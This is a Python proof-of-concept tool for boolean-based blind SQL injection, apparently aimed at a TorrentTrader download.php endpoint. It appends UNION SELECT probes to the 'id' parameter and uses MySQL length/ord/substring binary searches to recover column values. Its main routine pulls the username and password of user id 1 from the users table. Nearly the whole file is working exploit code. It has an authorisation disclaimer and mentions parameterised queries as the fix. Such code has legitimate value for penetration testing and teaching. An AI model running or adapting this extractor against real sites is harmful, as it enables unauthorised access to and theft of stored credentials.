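#!/usr/bin/env python3
"""Boolean-based blind SQL injection extractor (proof of concept).

The script recovers one column value from one row by asking the target a
series of yes/no questions and checking whether a known "true" marker string
appears in the HTTP response.  Each question is appended to the vulnerable
``id`` parameter as ``and 0 union select 1 from <table> where <object> and
<condition>``: the ``and 0`` falsifies the original WHERE clause, so the page
reports a hit exactly when the injected SELECT returns a row.

The conditions use MySQL's ``length()``, ``ord()`` and ``substring()``; for
another database, or another injection context, override the ``oracle_*``
methods -- they are the only code that knows the SQL dialect.

Cost: every oracle call is one HTTP request.  Recovering an ``n``-character
value takes about ``length + n * log2(len(charset))`` requests.

This is an offensive test tool.  Run it only against systems you are
explicitly authorised to test.  The weakness it exploits is string
concatenation of a request parameter into SQL; the server-side fix is a
parameterised query, not input filtering.

Ported to Python 3 from the original Python 2 script.  Fixes relative to
the original: the sort of the character set was computed on a throwaway copy
and discarded, the default character set was missing ``Q`` and all
punctuation, a character outside the set made the search recurse forever or
raise an "Internal Error", a field longer than the probe limit was silently
reported with the wrong length, and every HTTP response object was leaked.
"""
import sys
import urllib.parse
import urllib.request

# Total number of HTTP requests issued by all injectors (printed at exit).
requests = 0

# Every printable 7-bit ASCII character, in code-point order.  The binary
# search over the character set relies on this being the same ordering that
# MySQL's ord() imposes on the stored bytes.
PRINTABLE_ASCII = "".join(chr(c) for c in range(32, 127))

# Defaults for the sample target; real use overrides both.
DEFAULT_SCRIPTBASE = 'http://127.0.0.1/~md/torrenttrader/download.php?id=1'
DEFAULT_TRUEANSWER = "The ID has been found on the Database, but the torrent"


class BlindInjector:
    """Extract ``tabletocheck.fieldtocheck`` for the row matching ``objecttocheck``.

    Constructing an instance runs the extraction immediately (as the original
    script did) unless ``autorun=False`` is passed; the recovered value is then
    available as ``self.result`` or from ``doit()``.

    Hook points: ``oracle_len_eq``, ``oracle_eq``, ``oracle_lt``, ``oracle_gt``
    build the SQL conditions, ``build_url`` places them in the request and
    ``query`` performs the HTTP round trip and decides true/false.
    """

    # --- oracles: the only methods that know the target's SQL dialect ---------

    def oracle_len_eq(self, thetry):
        """True iff ``length(field) == thetry`` on the target."""
        return self.query('%s and length(%s)=%d'
                          % (self.objecttocheck, self.fieldtocheck, thetry))

    def oracle_eq(self, p, thetry):
        """True iff the character at 1-based position ``p`` equals ``thetry``."""
        return self.query('%s and ord(substring(%s,%d,1))=%d'
                          % (self.objecttocheck, self.fieldtocheck, p, ord(thetry)))

    def oracle_lt(self, p, thetry):
        """True iff the character at 1-based position ``p`` sorts below ``thetry``."""
        return self.query('%s and ord(substring(%s,%d,1))<%d'
                          % (self.objecttocheck, self.fieldtocheck, p, ord(thetry)))

    def oracle_gt(self, p, thetry):
        """True iff the character at 1-based position ``p`` sorts above ``thetry``.

        Not used by the default search (``eq``/``lt`` suffice) but kept as a
        hook for subclasses.
        """
        return self.query('%s and ord(substring(%s,%d,1))>%d'
                          % (self.objecttocheck, self.fieldtocheck, p, ord(thetry)))

    # --- search ---------------------------------------------------------------

    def searchsub(self, p, testfield):
        """Binary-search ``testfield`` for the character at 1-based position ``p``.

        ``testfield`` is any iterable of single characters; it is de-duplicated
        and sorted here so the search order matches ``ord()`` regardless of the
        order the caller supplied.

        Raises:
            RuntimeError: the character is not in ``testfield`` (extend the set).
        """
        chars = sorted(set(testfield))
        lo, hi = 0, len(chars)
        while lo < hi:
            mid = (lo + hi) // 2
            candidate = chars[mid]
            if self.oracle_eq(p, candidate):
                return candidate
            if self.oracle_lt(p, candidate):
                hi = mid            # answer is strictly below the candidate
            else:
                lo = mid + 1        # strictly above; candidate itself is already ruled out
        raise RuntimeError("character at position %d is not in the charset %r"
                           % (p, "".join(chars)))

    def binsearch(self, testfield=PRINTABLE_ASCII, maxlen=4096):
        """Recover the whole field: first its length, then each character in turn.

        Args:
            testfield: characters the value may consist of (order irrelevant).
            maxlen: largest length probed; lengths 0..maxlen are tried in order.

        Returns:
            The recovered string.

        Raises:
            RuntimeError: no length in 0..maxlen matched, or a character was
                outside ``testfield``.
        """
        length = self._find_length(maxlen)
        chars = sorted(set(testfield))
        found = []
        for p in range(1, length + 1):
            found.append(self.searchsub(p, chars))
            self._status('\r%s' % ''.join(found))
        print()
        return ''.join(found)

    def _find_length(self, maxlen):
        """Probe lengths 0..maxlen linearly and return the first that matches."""
        for candidate in range(maxlen + 1):
            self._status('\rfinding fieldlen ... %d' % candidate)
            if self.oracle_len_eq(candidate):
                print('\rfinding fieldlen ... %d' % candidate)
                return candidate
        # The original fell through here and silently used maxlen-1 as the length.
        raise RuntimeError("field length not found in 0..%d" % maxlen)

    @staticmethod
    def _status(msg):
        """Write a progress line without a newline so ``\\r`` overwrites in place."""
        sys.stdout.write(msg)
        sys.stdout.flush()

    # --- transport ------------------------------------------------------------

    def build_url(self, s):
        """Return the probe URL for condition ``s``.

        Everything after ``scriptbase`` is percent-encoded (``quote`` keeps
        ``/`` unencoded, as the original ``urllib.quote`` did).
        """
        return self.scriptbase + urllib.parse.quote(self.unionbase + s)

    def query(self, s):
        """Send one probe and return True iff the response contains ``trueanswer``.

        Increments the module-level ``requests`` counter.  Raises whatever
        ``urllib.request.urlopen`` raises on a transport error.
        """
        global requests
        url = self.build_url(s)
        if self.verbose:
            print(url)
        # The response must be closed, otherwise one socket leaks per probe.
        # Bytes are decoded leniently: the marker is ASCII, so the page's real
        # encoding does not matter for the substring test.
        with urllib.request.urlopen(url) as resp:
            body = resp.read().decode('utf-8', errors='replace')
        requests += 1
        return self.trueanswer in body

    # --- driver ---------------------------------------------------------------

    def doit(self):
        """Run the extraction, print the outcome and return the recovered value."""
        print('finding %s.%s for %r:'
              % (self.tabletocheck, self.fieldtocheck, self.objecttocheck))
        result = self.binsearch()
        print('%s.%s for %r is %r'
              % (self.tabletocheck, self.fieldtocheck, self.objecttocheck, result))
        return result

    def __init__(self, fieldtocheck, objecttocheck,
                 scriptbase=DEFAULT_SCRIPTBASE, trueanswer=DEFAULT_TRUEANSWER,
                 tabletocheck='users', *, verbose=True, autorun=True):
        """Configure the injector and, by default, run it at once.

        Args:
            fieldtocheck: column to extract (e.g. ``'username'``).
            objecttocheck: SQL condition selecting the row (e.g. ``'id=1'``).
            scriptbase: URL up to and including the injectable parameter value.
            trueanswer: substring present in the response iff the probe was true.
            tabletocheck: table holding ``fieldtocheck``.
            verbose: print every probe URL (the original always did).
            autorun: call ``doit()`` from the constructor (the original always did).
        """
        self.trueanswer = trueanswer
        self.scriptbase = scriptbase
        self.tabletocheck = tabletocheck
        self.fieldtocheck = fieldtocheck
        self.objecttocheck = objecttocheck
        # ``and 0`` kills the page's own WHERE; the injected SELECT alone decides
        # whether a row -- and hence the "found" marker -- comes back.
        self.unionbase = " and 0 union select 1 from %s where " % tabletocheck
        self.verbose = verbose
        self.result = None
        if autorun:
            self.result = self.doit()


def main():
    """Extract username and password of user id 1 from the sample target."""
    BlindInjector(fieldtocheck='username', objecttocheck='id=1')
    BlindInjector(fieldtocheck='password', objecttocheck='id=1')
    print("total %d requests done" % requests)


if __name__ == "__main__":
    main()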